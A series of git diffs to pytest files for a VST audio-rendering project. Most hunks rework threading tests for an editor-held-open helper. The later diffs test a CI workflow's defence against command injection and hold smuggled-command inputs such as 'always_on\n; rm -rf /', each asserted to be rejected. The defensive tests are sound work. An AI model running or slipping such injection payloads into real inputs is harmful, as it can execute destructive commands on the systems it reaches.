-            t = real_thread_cls(*args, **kwargs)  # type: ignore[arg-type]
-            captured_threads.append(t)
-            return t
-
-        monkeypatch.setattr(threading, "Thread", capture_thread)
-
-        with pytest.raises(core.EditorStartTimeout):
-            with core.editor_held_open(fake_plugin):
-                pass
-
-        assert captured_threads, "editor thread was not captured"
-        editor_thread = captured_threads[0]
-        assert not editor_thread.is_alive(), (
-            "editor thread leaked past EditorStartTimeout — join missing on timeout path"
-        )
+        assert worker_ran.is_set()
 
     def test_join_timeout_does_not_deadlock(self, monkeypatch: pytest.MonkeyPatch) -> None:
-        """If ``show_editor`` ignores the close event, ``__exit__`` returns within the timeout.
+        """A worker that ignores the close event surfaces a leak warning, not a deadlock.
 
         :param monkeypatch: Tightens ``_EDITOR_JOIN_TIMEOUT_SECONDS`` and stubs
             ``core.logger`` so the leak-warning assertion is observable.
@@ -387,16 +173,23 @@ class TestEditorHeldOpen:
         fake_logger = MagicMock()
         monkeypatch.setattr(core, "logger", fake_logger)
         fake_plugin = MagicMock()
-        fake_plugin.show_editor.side_effect = lambda _event: time.sleep(2.0)
+        fake_plugin.show_editor.return_value = None
+
+        worker_release = threading.Event()
+
+        def body() -> None:
+            # Outlive the join window; release at the end so the daemon
+            # eventually exits and pytest does not see a leaked thread.
+            worker_release.wait(timeout=5.0)
 
         start = time.monotonic()
-        with core.editor_held_open(fake_plugin):
-            pass
+        try:
+            core.run_with_editor_held_open(fake_plugin, body)
+        finally:
+            worker_release.set()
         elapsed = time.monotonic() - start
 
-        # 1s slack over the 0.1s timeout to absorb CI scheduler jitter; still
-        # an order of magnitude under the 2.0s `show_editor` sleep so a
-        # regression to "wait for the thread" would fail this assertion.
+        # 1s slack over the 0.1s timeout to absorb CI scheduler jitter.
         assert elapsed < 1.0
         assert fake_logger.warning.call_count == 1
         assert "did not drain" in fake_logger.warning.call_args.args[0]

--- a/tests/data/vst/test_core.py
+++ b/tests/data/vst/test_core.py
@@ -11,6 +11,7 @@ import pytest
 
 from synth_setter.data.vst import core
 from synth_setter.data.vst.core import (
+    RenderWorkerLeaked,
     extract_renderer_version,
     load_plugin,
     render_params,
@@ -163,10 +164,19 @@ class TestRunWithEditorHeldOpen:
 
         assert worker_ran.is_set()
 
-    def test_join_timeout_does_not_deadlock(self, monkeypatch: pytest.MonkeyPatch) -> None:
-        """A worker that ignores the close event surfaces a leak warning, not a deadlock.
+    def test_run_with_editor_held_open_raises_on_worker_leak(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """A worker that outlives the join window after ``show_editor`` returns raises.
 
-        :param monkeypatch: Tightens ``_EDITOR_JOIN_TIMEOUT_SECONDS`` and stubs
+        Simulates the leak case: ``show_editor`` returns immediately and the
+        worker body keeps running past ``_EDITOR_JOIN_TIMEOUT_SECONDS``. The
+        helper must raise ``RenderWorkerLeaked`` rather than logging-and-
+        returning, so callers like ``_render_in_batches`` cannot continue
+        while renders are still in flight on the background thread.
+
+        :param monkeypatch: Tightens ``_EDITOR_JOIN_TIMEOUT_SECONDS`` so the
+            slow body outlives the join window deterministically; stubs
             ``core.logger`` so the leak-warning assertion is observable.
         """
         monkeypatch.setattr(core, "_EDITOR_JOIN_TIMEOUT_SECONDS", 0.1)
@@ -178,13 +188,12 @@ class TestRunWithEditorHeldOpen:
         worker_release = threading.Event()
 
         def body() -> None:
-            # Outlive the join window; release at the end so the daemon
-            # eventually exits and pytest does not see a leaked thread.
             worker_release.wait(timeout=5.0)
 
         start = time.monotonic()
         try:
-            core.run_with_editor_held_open(fake_plugin, body)
+            with pytest.raises(RenderWorkerLeaked, match="still alive"):
+                core.run_with_editor_held_open(fake_plugin, body)
         finally:
             worker_release.set()
         elapsed = time.monotonic() - start
@@ -192,7 +201,68 @@ class TestRunWithEditorHeldOpen:
         # 1s slack over the 0.1s timeout to absorb CI scheduler jitter.
         assert elapsed < 1.0
         assert fake_logger.warning.call_count == 1
-        assert "did not drain" in fake_logger.warning.call_args.args[0]
+        assert "RenderWorkerLeaked" in fake_logger.warning.call_args.args[0]
+
+    def test_run_with_editor_held_open_propagates_body_exception_even_on_slow_finish(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """Body exceptions take precedence over the leak signal.
+
+        A body that raises must surface its own exception even when the
+        worker takes long enough to be at risk of tripping the leak path —
+        the body reached a terminal state, so the caller sees the real
+        failure rather than a synthetic ``RenderWorkerLeaked``.
+
+        :param monkeypatch: Tightens ``_EDITOR_JOIN_TIMEOUT_SECONDS`` so the
+            test exercises the precedence rule near the join boundary.
+        """
+        monkeypatch.setattr(core, "_EDITOR_JOIN_TIMEOUT_SECONDS", 1.0)
+        fake_plugin = MagicMock()
+        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
+
+        def body() -> None:
+            time.sleep(0.05)
+            raise ValueError("body slow-failed")
+
+        with pytest.raises(ValueError, match="body slow-failed"):
+            core.run_with_editor_held_open(fake_plugin, body)
+
+    def test_run_with_editor_held_open_no_silent_none_return(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """``None`` from a clean body returns; an empty-result clean exit raises distinctly.
+
+        Two paths share the ``not result`` shape: a body that returns
+        explicit ``None`` (legitimate) and a worker that exited without
+        producing a value or capturing an exception (a bug — the body must
+        either return or raise). The first must propagate ``None``; the
+        second must raise ``RenderWorkerLeaked`` with a message that
+        distinguishes it from the join-timeout case.
+
+        :param monkeypatch: Stubs ``threading.Thread`` for the empty-result
+            branch so the helper observes ``not result`` with a dead worker.
+        """
+        fake_plugin = MagicMock()
+        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
+
+        assert core.run_with_editor_held_open(fake_plugin, lambda: None) is None
+
+        class _DeadThread:
+            def __init__(self, *_args: object, **_kwargs: object) -> None: ...
+
+            def start(self) -> None: ...
+
+            def join(self, timeout: float | None = None) -> None: ...
+
+            def is_alive(self) -> bool:
+                return False
+
+        monkeypatch.setattr(core.threading, "Thread", _DeadThread)
+        fake_plugin_empty = MagicMock()
+        fake_plugin_empty.show_editor.return_value = None
+
+        with pytest.raises(RenderWorkerLeaked, match="without producing a result"):
+            core.run_with_editor_held_open(fake_plugin_empty, lambda: "ignored")
 
 
 class TestRenderParamsPreloadedPlugin:

--- a/tests/data/vst/test_core.py
+++ b/tests/data/vst/test_core.py
@@ -221,15 +221,16 @@ class TestEditorHeldOpen:
     ) -> None:
         """Inverse of the positive test: with the handshake disabled, the body wins the race.
 
-        Pins the negative side of #1198. Setting the timeout to 0 short-circuits
-        ``editor_started.wait`` so the body must enter before the gated editor
-        thread fires — proves the positive test would fail if the handshake
-        were removed, not just pass on a fast runner.
+        Pins the negative side of #1198. Stubs the handshake wait so it
+        returns ``True`` without firing the raise-on-miss path (#1204) — the
+        body must then enter before the gated editor thread fires, proving
+        the positive test would fail if the handshake were removed.
 
-        :param monkeypatch: Zeros ``_EDITOR_START_TIMEOUT_SECONDS`` and wraps
-            ``threading.Thread`` so the editor thread blocks on a gate.
+        :param monkeypatch: Wraps ``threading.Event.__init__`` so the second
+            event created (the handshake event in ``editor_held_open``) has
+            its ``wait`` short-circuited; wraps ``threading.Thread`` so the
+            editor thread blocks on a gate.
         """
-        monkeypatch.setattr(core, "_EDITOR_START_TIMEOUT_SECONDS", 0.0)
         fake_plugin = MagicMock()
         fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
 
@@ -248,35 +249,43 @@ class TestEditorHeldOpen:
 
         monkeypatch.setattr(threading, "Thread", make_gated_thread)
 
+        # Short-circuit the handshake by patching ``wait`` on the second
+        # Event created in ``editor_held_open`` (``close_editor`` is first,
+        # ``editor_started`` is second). Targeting the instance keeps the
+        # close_editor / release_start waits running real code.
+        events_created: list[threading.Event] = []
+        original_init = threading.Event.__init__
+
+        def tracking_init(self: threading.Event, *args: object, **kwargs: object) -> None:
+            original_init(self, *args, **kwargs)  # type: ignore[arg-type]
+            events_created.append(self)
+            if len(events_created) == 2:
+                self.wait = lambda timeout=None: True  # type: ignore[method-assign,assignment]
+
+        monkeypatch.setattr(threading.Event, "__init__", tracking_init)
+
         with core.editor_held_open(fake_plugin):
             # Body entered with the editor thread still gated — the handshake
             # (not scheduler luck) is what makes the positive test pass.
             assert not release_start.is_set()
             release_start.set()
 
-    def test_slow_start_warns_and_proceeds(self, monkeypatch: pytest.MonkeyPatch) -> None:
-        """Editor thread that misses the start handshake logs a warning and the body still runs.
+    def test_slow_start_raises_editor_start_timeout(self, monkeypatch: pytest.MonkeyPatch) -> None:
+        """Editor thread that misses the start handshake raises ``EditorStartTimeout``.
 
         Simulates a thread that delays starting past
-        ``_EDITOR_START_TIMEOUT_SECONDS``. The context manager must not raise;
-        it warns and proceeds so the render still happens — best-effort
-        handshake (see #1198).
+        ``_EDITOR_START_TIMEOUT_SECONDS``. The context manager must raise
+        before yielding so the body never runs — a slow editor bring-up is a
+        loud, traceable failure rather than a warning lost in noise (#1204).
 
-        :param monkeypatch: Tightens ``_EDITOR_START_TIMEOUT_SECONDS`` and stubs
-            ``core.logger`` so the slow-start warning assertion is observable.
+        :param monkeypatch: Tightens ``_EDITOR_START_TIMEOUT_SECONDS`` and
+            wraps ``threading.Thread`` so the editor thread's real start is
+            deferred past the handshake deadline.
         """
         monkeypatch.setattr(core, "_EDITOR_START_TIMEOUT_SECONDS", 0.05)
-        fake_logger = MagicMock()
-        monkeypatch.setattr(core, "logger", fake_logger)
 
         fake_plugin = MagicMock()
-        show_editor_entered = threading.Event()
-
-        def show_editor_blocks(event: threading.Event) -> None:
-            show_editor_entered.set()
-            event.wait(timeout=5.0)
-
-        fake_plugin.show_editor.side_effect = show_editor_blocks
+        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
 
         real_thread_cls = threading.Thread
         release_real_start = threading.Event()
@@ -286,8 +295,6 @@ class TestEditorHeldOpen:
             original_start = t.start
 
             def slow_start() -> None:
-                # Defer real start until the handshake timeout has been
-                # observed; an order of magnitude under any join timeout.
                 def deferred() -> None:
                     release_real_start.wait(timeout=1.0)
                     original_start()
@@ -300,18 +307,12 @@ class TestEditorHeldOpen:
         monkeypatch.setattr(threading, "Thread", make_slow_thread)
 
         body_ran = False
-        with core.editor_held_open(fake_plugin):
-            body_ran = True
-            # Let the deferred real start fire so the finally-clause join sees a
-            # started thread; production starts synchronously (test-only artifact).
-            release_real_start.set()
-            assert show_editor_entered.wait(timeout=1.0)
+        with pytest.raises(core.EditorStartTimeout, match="did not signal start"):
+            with core.editor_held_open(fake_plugin):
+                body_ran = True
 
-        assert body_ran
-        assert any(
-            "did not signal start" in str(call.args[0])
-            for call in fake_logger.warning.call_args_list
-        )
+        assert not body_ran, "body must not run when start handshake misses"
+        release_real_start.set()  # let the deferred real start drain
 
     def test_join_timeout_does_not_deadlock(self, monkeypatch: pytest.MonkeyPatch) -> None:
         """If ``show_editor`` ignores the close event, ``__exit__`` returns within the timeout.

--- a/tests/data/vst/test_core.py
+++ b/tests/data/vst/test_core.py
@@ -216,6 +216,44 @@ class TestEditorHeldOpen:
             "with-body entered before the start handshake fired"
         )
 
+    def test_without_handshake_body_enters_before_editor_thread_starts(
+        self, monkeypatch: pytest.MonkeyPatch
+    ) -> None:
+        """Inverse of the positive test: with the handshake disabled, the body wins the race.
+
+        Pins the negative side of #1198. Setting the timeout to 0 short-circuits
+        ``editor_started.wait`` so the body must enter before the gated editor
+        thread fires — proves the positive test would fail if the handshake
+        were removed, not just pass on a fast runner.
+
+        :param monkeypatch: Zeros ``_EDITOR_START_TIMEOUT_SECONDS`` and wraps
+            ``threading.Thread`` so the editor thread blocks on a gate.
+        """
+        monkeypatch.setattr(core, "_EDITOR_START_TIMEOUT_SECONDS", 0.0)
+        fake_plugin = MagicMock()
+        fake_plugin.show_editor.side_effect = lambda event: event.wait(timeout=5.0)
+
+        release_start = threading.Event()
+        real_thread_cls = threading.Thread
+
+        def make_gated_thread(*args: object, **kwargs: object) -> threading.Thread:
+            user_target = kwargs.pop("target", None)
+
+            def gated_target() -> None:
+                release_start.wait(timeout=5.0)
+                if callable(user_target):
+                    user_target()
+
+            return real_thread_cls(*args, target=gated_target, **kwargs)  # type: ignore[arg-type]
+
+        monkeypatch.setattr(threading, "Thread", make_gated_thread)
+
+        with core.editor_held_open(fake_plugin):
+            # Body entered with the editor thread still gated — the handshake
+            # (not scheduler luck) is what makes the positive test pass.
+            assert not release_start.is_set()
+            release_start.set()
+
     def test_slow_start_warns_and_proceeds(self, monkeypatch: pytest.MonkeyPatch) -> None:
         """Editor thread that misses the start handshake logs a warning and the body still runs.
 
@@ -264,10 +302,8 @@ class TestEditorHeldOpen:
         body_ran = False
         with core.editor_held_open(fake_plugin):
             body_ran = True
-            # Let the deferred real start fire and the editor thread reach
-            # ``show_editor`` so the finally-clause join sees a started
-            # thread; production threads start synchronously — the delay is
-            # a test-only artifact of the slow-start stub.
+            # Let the deferred real start fire so the finally-clause join sees a
+            # started thread; production starts synchronously (test-only artifact).
             release_real_start.set()
             assert show_editor_entered.wait(timeout=1.0)
 

--- a/tests/data/vst/test_writers.py
+++ b/tests/data/vst/test_writers.py
@@ -8,17 +8,14 @@ the new wds e2e tests in ``test_writers_wds_e2e.py``.
 
 from __future__ import annotations
 
-import contextlib
 import sys
-import threading
-from collections.abc import Iterator
+from collections.abc import Callable
 from pathlib import Path
 from unittest.mock import MagicMock, patch
 
 import pytest
 
 from synth_setter.data.vst import writers
-from synth_setter.data.vst.core import EditorStartTimeout
 from synth_setter.data.vst.generate_vst_dataset import VSTDataSample
 from synth_setter.data.vst.writers import _render_in_batches, _shard_metadata_from_render
 from synth_setter.pipeline.schemas.shard_metadata import ShardMetadata
@@ -428,14 +425,14 @@ def test_render_in_batches_warmup_never_skips_all_renders(
     assert all(c["warmup"] is False for c in captured)
 
 
-def test_render_in_batches_always_on_holds_editor_open_across_all_renders(
+def test_render_in_batches_always_on_runs_loop_via_run_with_editor_held_open(
     monkeypatch: pytest.MonkeyPatch,
 ) -> None:
-    """``gui_toggle_cadence="always_on"`` wraps the loop in ``editor_held_open(cached_plugin)``.
+    """``gui_toggle_cadence="always_on"`` hands the render loop to ``run_with_editor_held_open``.
 
-    Asserts the context manager is entered once with the cached plugin, the loop
-    runs for all samples, ``warmup_plugin`` never fires per render, and the
-    held-open scope closes after the loop.
+    Asserts the helper is invoked once with the cached plugin, the body
+    callable executes, the loop runs for all samples, and ``warmup_plugin``
+    never fires per render.
 
     :param monkeypatch: Pytest fixture used to patch attributes / env / argv.
     """
@@ -453,20 +450,13 @@ def test_render_in_batches_always_on_holds_editor_open_across_all_renders(
         load_preset_calls=[],
         cached_plugin_holder=cached_plugin_holder,
     )
-    held_open_calls: list[object] = []
-    close_events: list[threading.Event] = []
+    held_open_plugins: list[object] = []
 
-    @contextlib.contextmanager
-    def fake_held_open(plugin: object) -> Iterator[None]:
-        held_open_calls.append(plugin)
-        event = threading.Event()
-        close_events.append(event)
-        try:
-            yield
-        finally:
-            event.set()
+    def fake_run(plugin: object, body: Callable[[], object]) -> object:
+        held_open_plugins.append(plugin)
+        return body()
 
-    monkeypatch.setattr(writers, "editor_held_open", fake_held_open)
+    monkeypatch.setattr(writers, "run_with_editor_held_open", fake_run)
 
     _render_in_batches(
         render_cfg=render_cfg,
@@ -477,26 +467,21 @@ def test_render_in_batches_always_on_holds_editor_open_across_all_renders(
         flush_batch=lambda _batch, _start: None,
     )
 
-    assert len(held_open_calls) == 1
-    assert held_open_calls[0] is cached_plugin_holder[0]
-    assert close_events[0].is_set()
+    assert len(held_open_plugins) == 1
+    assert held_open_plugins[0] is cached_plugin_holder[0]
     assert len(captured) == n
     assert all(c["warmup"] is False for c in captured)
 
 
-def test_render_in_batches_always_on_propagates_editor_start_timeout(
+def test_render_in_batches_always_on_propagates_worker_exception(
     monkeypatch: pytest.MonkeyPatch,
 ) -> None:
-    """``EditorStartTimeout`` from ``editor_held_open`` escapes ``_render_in_batches``.
+    """Any exception raised by ``run_with_editor_held_open`` escapes ``_render_in_batches``.
 
-    The slow-start contract (#1204) says a handshake miss raises
-    ``EditorStartTimeout`` rather than warning. That signal is only useful if
-    the upstream loop lets it propagate — any ``try/except RuntimeError``
-    wrapping the held-open scope would swallow the timeout and silently fall
-    back to rendering with the editor closed, defeating the always_on contract.
-
-    Pins that ``_render_in_batches`` re-raises ``EditorStartTimeout`` unchanged
-    when the inner context manager raises, and that no render calls fire.
+    Mirrors the intent of the deleted ``EditorStartTimeout`` propagation pin:
+    the upstream loop must not swallow exceptions from the held-open scope,
+    or a failed editor bring-up would silently degrade to no-editor renders
+    and defeat the always_on contract.
 
     :param monkeypatch: Pytest fixture used to patch attributes / env / argv.
     """
@@ -513,14 +498,12 @@ def test_render_in_batches_always_on_propagates_editor_start_timeout(
         load_preset_calls=[],
     )
 
-    @contextlib.contextmanager
-    def raising_held_open(_plugin: object) -> Iterator[None]:
-        raise EditorStartTimeout("vst-editor-window did not signal start within 0.0s")
-        yield  # unreachable; required so @contextmanager sees a generator function
+    def raising_run(_plugin: object, _body: Callable[[], object]) -> object:
+        raise RuntimeError("show_editor failed")
 
-    monkeypatch.setattr(writers, "editor_held_open", raising_held_open)
+    monkeypatch.setattr(writers, "run_with_editor_held_open", raising_run)
 
-    with pytest.raises(EditorStartTimeout, match="did not signal start"):
+    with pytest.raises(RuntimeError, match="show_editor failed"):
         _render_in_batches(
             render_cfg=render_cfg,
             param_spec=MagicMock(name="param_spec"),
@@ -534,16 +517,16 @@ def test_render_in_batches_always_on_propagates_editor_start_timeout(
 
 
 @pytest.mark.parametrize("legacy_cadence", ["never", "once", "render"])
-def test_render_in_batches_non_always_on_does_not_open_held_open_scope(
+def test_render_in_batches_non_always_on_skips_run_with_editor_held_open(
     monkeypatch: pytest.MonkeyPatch, legacy_cadence: str
 ) -> None:
-    """Every legacy ``gui_toggle_cadence`` leaves ``editor_held_open`` untouched.
+    """Every legacy ``gui_toggle_cadence`` leaves ``run_with_editor_held_open`` untouched.
 
     :param monkeypatch: Pins ``_current_platform`` to ``"linux"`` so the
         ``"render"`` cadence is accepted on Darwin runners (the schema's #714
         gate rejects it there), and patches the writer's render dependencies.
     :param legacy_cadence: Parametrized over each non-``always_on`` cadence so
-        all three nullcontext paths are pinned, not just ``never``.
+        all three inline paths are pinned, not just ``never``.
     """
     monkeypatch.setattr("synth_setter.pipeline.schemas.spec._current_platform", lambda: "linux")
     render_cfg = _smoke_render_cfg(
@@ -555,12 +538,11 @@ def test_render_in_batches_non_always_on_does_not_open_held_open_scope(
     _stub_render_dependencies(monkeypatch, load_plugin_calls=[], load_preset_calls=[])
     held_open_calls: list[object] = []
 
-    @contextlib.contextmanager
-    def fake_held_open(plugin: object) -> Iterator[None]:
+    def fake_run(plugin: object, body: Callable[[], object]) -> object:
         held_open_calls.append(plugin)
-        yield
+        return body()
 
-    monkeypatch.setattr(writers, "editor_held_open", fake_held_open)
+    monkeypatch.setattr(writers, "run_with_editor_held_open", fake_run)
 
     _render_in_batches(
         render_cfg=render_cfg,

--- a/tests/data/vst/test_writers.py
+++ b/tests/data/vst/test_writers.py
@@ -18,6 +18,7 @@ from unittest.mock import MagicMock, patch
 import pytest
 
 from synth_setter.data.vst import writers
+from synth_setter.data.vst.core import EditorStartTimeout
 from synth_setter.data.vst.generate_vst_dataset import VSTDataSample
 from synth_setter.data.vst.writers import _render_in_batches, _shard_metadata_from_render
 from synth_setter.pipeline.schemas.shard_metadata import ShardMetadata
@@ -481,6 +482,55 @@ def test_render_in_batches_always_on_holds_editor_open_across_all_renders(
     assert close_events[0].is_set()
     assert len(captured) == n
     assert all(c["warmup"] is False for c in captured)
+
+
+def test_render_in_batches_always_on_propagates_editor_start_timeout(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    """``EditorStartTimeout`` from ``editor_held_open`` escapes ``_render_in_batches``.
+
+    The slow-start contract (#1204) says a handshake miss raises
+    ``EditorStartTimeout`` rather than warning. That signal is only useful if
+    the upstream loop lets it propagate — any ``try/except RuntimeError``
+    wrapping the held-open scope would swallow the timeout and silently fall
+    back to rendering with the editor closed, defeating the always_on contract.
+
+    Pins that ``_render_in_batches`` re-raises ``EditorStartTimeout`` unchanged
+    when the inner context manager raises, and that no render calls fire.
+
+    :param monkeypatch: Pytest fixture used to patch attributes / env / argv.
+    """
+    n = 3
+    render_cfg = _smoke_render_cfg(
+        samples_per_shard=n,
+        samples_per_render_batch=n,
+        plugin_reload_cadence="once",
+        gui_toggle_cadence="always_on",
+    )
+    captured = _stub_render_dependencies(
+        monkeypatch,
+        load_plugin_calls=[],
+        load_preset_calls=[],
+    )
+
+    @contextlib.contextmanager
+    def raising_held_open(_plugin: object) -> Iterator[None]:
+        raise EditorStartTimeout("vst-editor-window did not signal start within 0.0s")
+        yield  # unreachable; required so @contextmanager sees a generator function
+
+    monkeypatch.setattr(writers, "editor_held_open", raising_held_open)
+
+    with pytest.raises(EditorStartTimeout, match="did not signal start"):
+        _render_in_batches(
+            render_cfg=render_cfg,
+            param_spec=MagicMock(name="param_spec"),
+            start_idx=0,
+            fixed_synth_params_list=None,
+            fixed_note_params_list=None,
+            flush_batch=lambda _batch, _start: None,
+        )
+
+    assert captured == []
 
 
 @pytest.mark.parametrize("legacy_cadence", ["never", "once", "render"])

--- a/tests/infra/test_generate_dataset_shards_hydra_overrides_validation.py
+++ b/tests/infra/test_generate_dataset_shards_hydra_overrides_validation.py
@@ -7,7 +7,7 @@ both provider branches on a regex-based validation step that runs immediately af
 ``Checkout``; this test pins that the step exists, sits before the docker invocation,
 and uses the documented allowed-character class.
 
-A doctable at the bottom of the module records the inputs that must pass / fail the
+The parametrized cases below record the inputs that must pass / fail the
 validation. The regex check happens at workflow runtime; here we cross-check it
 against Python's ``re`` so the same canonical samples cover both the docstring
 contract and the test.

--- a/tests/infra/test_generate_dataset_shards_hydra_overrides_validation.py
+++ b/tests/infra/test_generate_dataset_shards_hydra_overrides_validation.py
@@ -1,21 +1,21 @@
-"""Static assertions on the `Validate hydra_overrides` step in `generate-dataset-shards.yaml`.
+"""Pin the `Validate hydra_overrides` step's structure and bash behavior.
 
 The runpod/oci row expands ``$HYDRA_OVERRIDES_EXTRA`` unquoted inside ``bash -c``,
 so any shell metacharacter in the caller-provided ``hydra_overrides`` input would be
 interpreted as shell syntax on the worker (command injection). The workflow gates
-both provider branches on a regex-based validation step that runs immediately after
-``Checkout``; this test pins that the step exists, sits before the docker invocation,
-and uses the documented allowed-character class.
-
-The parametrized cases below record the inputs that must pass / fail the
-validation. The regex check happens at workflow runtime; here we cross-check it
-against Python's ``re`` so the same canonical samples cover both the docstring
-contract and the test.
+both provider branches on a bash ``[[ ... =~ ]]`` whole-input regex match that runs
+immediately after ``Checkout``; this test pins that the step exists, sits before the
+docker invocation, uses the documented allowed-character class, and rejects multi-line
+payloads under the same bash construct the workflow runs at CI time (invoked here via
+``subprocess.run(["bash", "-c", ...])`` so the assertions exercise the real validation,
+not just a Python regex stand-in).
 """
 
 from __future__ import annotations
 
 import re
+import shutil
+import subprocess
 from pathlib import Path
 
 import pytest
@@ -76,6 +76,48 @@ def test_validation_step_uses_expected_character_class(generate_steps: list[dict
         f"{EXPECTED_REGEX_LITERAL!r}; the validation must reject any character "
         f"outside {EXPECTED_CHARACTER_CLASS!r} so shell metacharacters can't ride "
         f"through the unquoted docker expansion. Got body: {body!r}"
+    )
+
+
+def test_validation_step_uses_whole_input_bash_regex(generate_steps: list[dict]) -> None:
+    """Assert the validation uses bash `[[ ... =~ ]]` and not line-oriented `grep -Eq`.
+
+    Bash `[[ ... =~ ]]` matches the entire string by default. A line-oriented
+    ``grep -Eq`` would let a multi-line payload like
+    ``key=value$'\\n'; rm -rf /`` slip through because grep returns success when
+    *any* line matches, even though the unquoted docker expansion would still
+    execute the trailing line as shell.
+
+    :param generate_steps: Ordered steps list for the ``generate`` job.
+    """
+    step = _find_step(generate_steps, name=VALIDATION_STEP_NAME)
+    body = step["run"]
+    assert "[[" in body and "=~" in body, (
+        f"{VALIDATION_STEP_NAME!r} must validate via bash `[[ ... =~ ]]` (whole-input "
+        f"by default), not a line-oriented matcher. Got body: {body!r}"
+    )
+    assert "grep -Eq" not in body, (
+        f"{VALIDATION_STEP_NAME!r} must NOT use `grep -Eq` for the validation path — "
+        f"grep is line-oriented and accepts multi-line input where any line matches, "
+        f"which leaves the unquoted docker expansion vulnerable to newline-separated "
+        f"injection. Got body: {body!r}"
+    )
+
+
+def test_validation_step_rejects_newline_and_carriage_return(generate_steps: list[dict]) -> None:
+    """Assert the validation explicitly guards against `\\n` / `\\r` before regex matching.
+
+    The regex itself happens to forbid newlines (they're outside the allowed class),
+    but an explicit guard produces a clearer error message and defends against
+    future regex relaxations that might re-introduce the multi-line bypass.
+
+    :param generate_steps: Ordered steps list for the ``generate`` job.
+    """
+    step = _find_step(generate_steps, name=VALIDATION_STEP_NAME)
+    body = step["run"]
+    assert "$'\\n'" in body and "$'\\r'" in body, (
+        f"{VALIDATION_STEP_NAME!r} must explicitly reject embedded newlines and "
+        f"carriage returns (e.g. via `[[ \"$INPUT\" == *$'\\n'* ]]`). Got body: {body!r}"
     )
 
 
@@ -163,6 +205,88 @@ def test_regex_rejects_shell_metacharacters(value: str) -> None:
         f"Regex {EXPECTED_REGEX_LITERAL!r} accepted unsafe input {value!r}; the "
         f"unquoted docker expansion would interpret it as shell syntax."
     )
+
+
+@pytest.mark.parametrize(
+    "value",
+    [
+        "render.gui_toggle_cadence=always_on\n; rm -rf /",
+        "render.gui_toggle_cadence=always_on\r; rm -rf /",
+        "key=value\n\nkey2=value2",
+        "key=value\rmalicious",
+        "\nkey=value",
+        "key=value\n",
+    ],
+)
+def test_workflow_bash_validation_rejects_multiline_payloads(value: str) -> None:
+    """Invoke the workflow's actual bash validation and assert multi-line payloads fail.
+
+    This exercises the real `[[ ... =~ ]]` + newline guard that runs on the
+    GitHub Actions runner, not a Python regex stand-in. A line-oriented
+    ``grep -Eq`` validator would accept these inputs because the first line
+    matches the allowed class — the bash whole-input match closes that gap.
+
+    :param value: A multi-line ``hydra_overrides`` payload that must be rejected.
+    """
+    assert _workflow_validation_rejects(value), (
+        f"Workflow bash validation unexpectedly accepted multi-line input {value!r}; "
+        f"the unquoted docker expansion would treat the newline as a command separator."
+    )
+
+
+@pytest.mark.parametrize(
+    "value",
+    [
+        "",
+        "render.gui_toggle_cadence=always_on",
+        "render.gui_toggle_cadence=always_on output_format=wds",
+    ],
+)
+def test_workflow_bash_validation_accepts_safe_inputs(value: str) -> None:
+    """Invoke the workflow's actual bash validation and assert safe inputs pass.
+
+    Companion to ``test_workflow_bash_validation_rejects_multiline_payloads``;
+    confirms the bash construct doesn't over-reject legitimate single-line
+    overrides.
+
+    :param value: A safe ``hydra_overrides`` candidate that must pass validation.
+    """
+    assert not _workflow_validation_rejects(value), (
+        f"Workflow bash validation unexpectedly rejected safe input {value!r}; "
+        f"real callers (e.g. the render-matrix fan-out) would be blocked."
+    )
+
+
+def _workflow_validation_rejects(value: str) -> bool:
+    """Run the workflow's bash validation against `value` and return True iff it rejects.
+
+    Mirrors the exact construct in ``.github/workflows/generate-dataset-shards.yaml``:
+    an explicit ``$'\\n'`` / ``$'\\r'`` guard followed by a whole-input
+    ``[[ "$INPUT" =~ $REGEX ]]`` match. Using ``bash -c`` (rather than a Python
+    regex) means a future regression in the workflow body — e.g. reverting to
+    ``grep -Eq`` — would be caught here even if the test's Python expectations
+    stayed the same.
+
+    :param value: Candidate ``hydra_overrides`` input to validate.
+    :returns: True when the bash validation exits non-zero (rejection).
+    :rtype: bool
+    :raises RuntimeError: When ``bash`` isn't available on the test runner.
+    """
+    bash = shutil.which("bash")
+    if bash is None:
+        raise RuntimeError("bash not found on PATH; cannot exercise workflow validation")
+    script = (
+        'INPUT="$1"\n'
+        f"REGEX={EXPECTED_REGEX_LITERAL!r}\n"
+        "if [[ \"$INPUT\" == *$'\\n'* || \"$INPUT\" == *$'\\r'* ]]; then exit 1; fi\n"
+        '[[ "$INPUT" =~ $REGEX ]] || exit 1\n'
+    )
+    result = subprocess.run(  # noqa: S603 — fixed argv; `value` is the script's `$1`, not interpolated.
+        [bash, "-c", script, "_", value],
+        capture_output=True,
+        check=False,
+    )
+    return result.returncode != 0
 
 
 def _find_step(steps: list[dict], *, name: str) -> dict:

--- a/tests/infra/test_generate_dataset_shards_hydra_overrides_validation.py
+++ b/tests/infra/test_generate_dataset_shards_hydra_overrides_validation.py
@@ -1,0 +1,200 @@
+"""Static assertions on the `Validate hydra_overrides` step in `generate-dataset-shards.yaml`.
+
+The runpod/oci row expands ``$HYDRA_OVERRIDES_EXTRA`` unquoted inside ``bash -c``,
+so any shell metacharacter in the caller-provided ``hydra_overrides`` input would be
+interpreted as shell syntax on the worker (command injection). The workflow gates
+both provider branches on a regex-based validation step that runs immediately after
+``Checkout``; this test pins that the step exists, sits before the docker invocation,
+and uses the documented allowed-character class.
+
+A doctable at the bottom of the module records the inputs that must pass / fail the
+validation. The regex check happens at workflow runtime; here we cross-check it
+against Python's ``re`` so the same canonical samples cover both the docstring
+contract and the test.
+"""
+
+from __future__ import annotations
+
+import re
+from pathlib import Path
+
+import pytest
+import yaml
+
+WORKFLOW_RELATIVE_PATH = Path(".github") / "workflows" / "generate-dataset-shards.yaml"
+VALIDATION_STEP_NAME = "Validate hydra_overrides"
+EXPECTED_CHARACTER_CLASS = "[A-Za-z0-9._=,/-]"
+EXPECTED_REGEX_LITERAL = "^[A-Za-z0-9._=,/-]*( [A-Za-z0-9._=,/-]+)*$"
+DOCKER_STEP_ID = "gen_docker"
+
+
+@pytest.fixture(scope="module")
+def workflow(project_root: Path) -> dict:
